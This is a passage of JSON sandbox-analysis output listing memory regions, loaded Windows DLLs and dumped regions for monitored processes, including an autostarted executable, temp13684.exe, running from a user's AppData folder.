"region_864", "name": "pagefile_0x0000000000790000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7929856, "timestamp": "00:02:04.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9568256, "type": "region", "version": 1 }, "end_va": 30539775, "entry_point": 0, "filename": null, "id": "region_865", "name": "pagefile_0x0000000000920000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9568256, "timestamp": "00:02:04.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 30539776, "type": "region", "version": 1 }, "end_va": 33484799, "entry_point": 30539776, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_866", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 30539776, "timestamp": "00:02:04.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1962344448, "type": "region", "version": 1 }, "end_va": 1962430463, "entry_point": 1962344448, "filename": "\\Windows\\SysWOW64\\regapi.dll", "id": "region_867", "name": "regapi.dll", "norm_filename": "c:\\windows\\syswow64\\regapi.dll", "region_type": "memory_mapped_file", "start_va": 1962344448, "timestamp": "00:02:04.026", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000868-addr_0x00000000001a0000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_744", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1708031, "entry_point": 0, "filename": null, "id": "region_868", "name": "private_0x00000000001a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1703936, "timestamp": "00:02:34.516", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000869-addr_0x00000000001b0000-size_0x0000000000001000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_745", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_869", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:02:34.551", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000870-addr_0x00000000001c0000-size_0x0000000000011000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_746", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 69632, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1904639, "entry_point": 0, "filename": null, "id": "region_870", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:02:34.552", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1976893440, "type": "region", "version": 1 }, "end_va": 1978318847, "entry_point": 1976893440, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_871", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1976893440, "timestamp": "00:02:34.573", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000872-addr_0x0000000000290000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_747", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 0, "filename": null, "id": "region_872", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:02:34.802", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000873-addr_0x0000000002170000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_748", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 35061760, "type": "region", "version": 1 }, "end_va": 35127295, "entry_point": 0, "filename": null, "id": "region_873", "name": "private_0x0000000002170000", "norm_filename": null, "region_type": "private_memory", "start_va": 35061760, "timestamp": "00:02:34.803", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000874-addr_0x0000000002310000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_749", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 36765696, "type": "region", "version": 1 }, "end_va": 36831231, "entry_point": 0, "filename": null, "id": "region_874", "name": "private_0x0000000002310000", "norm_filename": null, "region_type": "private_memory", "start_va": 36765696, "timestamp": "00:02:34.803", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1963655168, "type": "region", "version": 1 }, "end_va": 1963745279, "entry_point": 1963655168, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_875", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1963655168, "timestamp": "00:02:34.812", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 4046847, "entry_point": 3801088, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_876", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 3801088, "timestamp": "00:02:34.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 4046847, "entry_point": 3805837, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_877", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 3801088, "timestamp": "00:02:34.830", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1963393024, "type": "region", "version": 1 }, "end_va": 1963634687, "entry_point": 1963397773, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_881", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1963393024, "timestamp": "00:02:34.838", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000882-addr_0x0000000000260000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_750", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_882", "name": "private_0x0000000000260000", "norm_filename": null, "region_type": "private_memory", "start_va": 2490368, "timestamp": "00:02:35.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16777216, "start_va": 36831232, "type": "region", "version": 1 }, "end_va": 53608447, "entry_point": 0, "filename": null, "id": "region_883", "name": "private_0x0000000002320000", "norm_filename": null, "region_type": "private_memory", "start_va": 36831232, "timestamp": "00:02:35.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 28672, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2584575, "entry_point": 0, "filename": null, "id": "region_884", "name": "pagefile_0x0000000000270000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2555904, "timestamp": "00:02:35.004", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 28672, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2519039, "entry_point": 0, "filename": null, "id": "region_885", "name": "pagefile_0x0000000000260000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2490368, "timestamp": "00:02:35.005", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Temp13684.exe\" ", "filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\temp13684.exe", "id": "proc_4", "image_name": "temp13684.exe", "monitor_reason": "autostart", "monitored_id": 4, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "process_00000004-region_00000937-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_751", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_937", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:03:25.282", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000938-addr_0x0000000000030000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_752", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_938", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:03:25.282", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_939", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:03:25.282", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000940-addr_0x0000000000050000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_753", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_940", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:03:25.285", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000941-addr_0x0000000000090000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_754", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_941", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:03:25.285", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1654783, "entry_point": 0, "filename": null, "id": "region_942", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:03:25.285", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000943-addr_0x0000000000400000-size_0x0000000000036000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_755", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 221184, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4415487, "entry_point": 4194304, "filename": "\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Temp13684.exe", "id": "region_943", "name": "temp13684.exe", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\temp13684.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:03:25.286", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1996357632, "type": "region", "version": 1 }, "end_va": 1998098431, "entry_point": 1996357632, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_944", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1996357632, "timestamp": "00:03:25.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1998323712, "type": "region", "version": 1 }, "end_va": 1999896575, "entry_point": 1998323712, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_945", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1998323712, "timestamp": "00:03:25.364", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_946", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:03:25.444", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000947-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_756", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_947", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:03:25.444", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000948-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_757", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_948", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:03:25.445", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000949-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_758", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_949", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:03:25.445", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_950", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:03:25.445", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000951-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_759", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_951", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:03:25.446", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_952", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:03:25.446", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001085-addr_0x0000000000340000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_760", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_1085", "name": "private_0x0000000000340000", "norm_filename": null, "region_type": "private_memory", "start_va": 3407872, "timestamp": "00:03:28.163", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1936785408, "type": "region", "version": 1 }, "end_va": 1937162239, "entry_point": 1936785408, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1086", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1936785408, "timestamp": "00:03:28.163", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1937178624, "type": "region", "version": 1 }, "end_va": 1937436671, "entry_point": 1937178624, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1087", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1937178624, "timestamp": "00:03:28.168", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1937506304, "type": "region", "version": 1 }, "end_va": 1937539071, "entry_point": 1937506304, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1088", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1937506304, "timestamp": "00:03:28.172", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001089-addr_0x00000000005e0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_761", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 6160384, "type": "region", "version": 1 }, "end_va": 7208959, "entry_point": 0, "filename": null, "id": "region_1089", "name": "private_0x00000000005e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6160384, "timestamp": "00:03:28.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1964244992, "type": "region", "version": 1 }, "end_va": 1965359103, "entry_point": 1964244992, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1090", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1964244992, "timestamp": "00:03:28.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1972371456, "type": "region", "version": 1 }, "end_va": 1972658175, "entry_point": 1972371456, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1091", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1972371456, "timestamp": "00:03:28.353", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001092-addr_0x0000000076dc0000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_762", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 1994129408, "type": "region", "version": 1 }, "end_va": 1995153407, "entry_point": 0, "filename": null, "id": "region_1092", "name": "private_0x0000000076dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994129408, "timestamp": "00:03:28.398", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00001093-addr_0x0000000076ec0000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_763", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 1995177984, "type": "region", "version": 1 }, "end_va": 1996353535, "entry_point": 0, "filename": null, "id": "region_1093", "name": "private_0x0000000076ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995177984, "timestamp": "00:03:28.398", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1094", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:03:28.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 2125823, "entry_point": 1703936, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1095", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1703936, "timestamp": "00:03:28.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1926037504, "type": "region", "version": 1 }, "end_va": 1926205439, "entry_point": 1926037504, "filename": "\\Windows\\SysWOW64\\mprapi.dll", "id": "region_1096", "name": "mprapi.dll", "norm_filename": "c:\\windows\\syswow64\\mprapi.dll", "region_type": "memory_mapped_file", "start_va": 1926037504, "timestamp": "00:03:28.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1926234112, "type": "region", "version": 1 }, "end_va": 1926316031, "entry_point": 1926234112, "filename": "\\Windows\\SysWOW64\\atl.dll", "id": "region_1097", "name": "atl.dll", "norm_filename": "c:\\windows\\syswow64\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1926234112, "timestamp": "00:03:28.620", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 1926365184, "type": "region", "version": 1 }, "end_va": 1926717439, "entry_point": 1926365184, "filename": "\\Windows\\SysWOW64\\certcli.dll", "id": "region_1098", "name": "certcli.dll", "norm_filename": "c:\\windows\\syswow64\\certcli.dll", "region_type": "memory_mapped_file", "start_va": 1926365184, "timestamp": "00:03:28.626", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1959854080, "type": "region", "version": 1 }, "end_va": 1959903231, "entry_point": 1959854080, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1099", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1959854080, "timestamp": "00:03:28.632", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1959919616, "type": "region", "version": 1 }, "end_va": 1960312831, "entry_point": 1959919616, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1100", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1959919616, "timestamp": "00:03:28.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1960312832, "type": "region", "version": 1 }, "end_va": 1960669183, "entry_point": 1960312832, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_1101", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1960312832, "timestamp": "00:03:28.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1966407679, "entry_point": 1965359104, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1102", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:03:28.708", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1966800896, "type": "region", "version": 1 }, "end_va": 1967456255, "entry_point": 1966800896, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1103", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1966800896, "timestamp": "00:03:28.755", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968099327, "entry_point": 1967456256, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1104", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:03:28.813", "type": "region", "version": 1 }, { 